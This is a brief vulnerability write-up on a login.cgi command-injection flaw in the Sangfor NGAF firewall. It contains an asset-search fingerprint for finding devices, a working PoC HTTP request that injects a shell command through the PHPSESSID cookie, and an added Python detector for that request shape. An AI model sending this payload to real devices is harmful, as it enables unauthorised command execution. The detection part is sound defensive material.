Sangfor NGAF next-generation firewall login.cgi remote command execution vulnerability
Vulnerability Description
Sangfor NGAF is a next-generation application firewall designed around application security needs.
Vulnerability Impact
Sangfor NGAF next-generation firewall
Network mapping (asset search query)
"Redirect.php?url=LogInOut.php"
Vulnerability reproduction
Login page
Verification PoC
POST /cgi-bin/login.cgi HTTP/1.1
Host:
Cache-Control: max-age=0
Content-Type: Application/X-www-Form
y-forwarded-for: 127.0.0.1
Cookie: PHPSESSID=`$(id > /fwlib/sys/virus/webui/svpn_html/3.txt)`;
{"opr":"login", "data":{"user": "watchTowr" , "pwd": "watchTowr" , "vericode": "NSLB" , "privacy_enable": "0"}}
The command output is written to a web-accessible file:
/svpn_html/3.txt
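A detection check for the request shape shown above, as an added example that is not part of the original post: it flags requests to /cgi-bin/login.cgi whose PHPSESSID cookie contains characters outside PHP's default session-ID alphabet. The function names, the host fw.example and both sample requests are constructed for illustration, and the allowed alphabet is an assumption about how the device issues session IDs.

```python
import re

TARGET_PATH = "/cgi-bin/login.cgi"  # endpoint named on this page
# Assumption: session IDs use PHP's default alphabet (0-9, a-z, A-Z, "," and "-").
SAFE_SESSION_ID = re.compile(r"[A-Za-z0-9,-]{1,256}")

def parse_request(raw):
    """Split a raw HTTP request into (path, headers) with lower-cased names."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    parts = lines[0].split(" ")
    path = parts[1].split("?", 1)[0] if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return path, headers

def session_id(cookie_header):
    """Return the raw PHPSESSID value, or None when the cookie is absent."""
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name == "PHPSESSID":
            return value
    return None

def check_request(raw):
    """Return a finding dict for a suspicious request, or None."""
    path, headers = parse_request(raw)
    sid = session_id(headers.get("cookie", ""))
    if path != TARGET_PATH or sid is None or SAFE_SESSION_ID.fullmatch(sid):
        return None
    bad = "".join(sorted(set(re.findall(r"[^A-Za-z0-9,-]", sid))))
    return {"path": path, "phpsessid": sid, "bad_chars": bad}

# Constructed sample requests (not captured traffic); fw.example is a placeholder.
BENIGN = ("POST /cgi-bin/login.cgi HTTP/1.1\r\nHost: fw.example\r\n"
          "Cookie: PHPSESSID=3f9c1a7be2d04c55a1b2c3d4e5f60718\r\n\r\n{}")
SUSPECT = ("POST /cgi-bin/login.cgi HTTP/1.1\r\nHost: fw.example\r\n"
           "Cookie: PHPSESSID=`$(echo constructed-sample)`;\r\n\r\n{}")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, check_request(req))
```

The same allowlist can be enforced at a reverse proxy or WAF in front of the management interface, rejecting the request before it reaches login.cgi.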
This post is licensed under CC BY 4.0 by the author.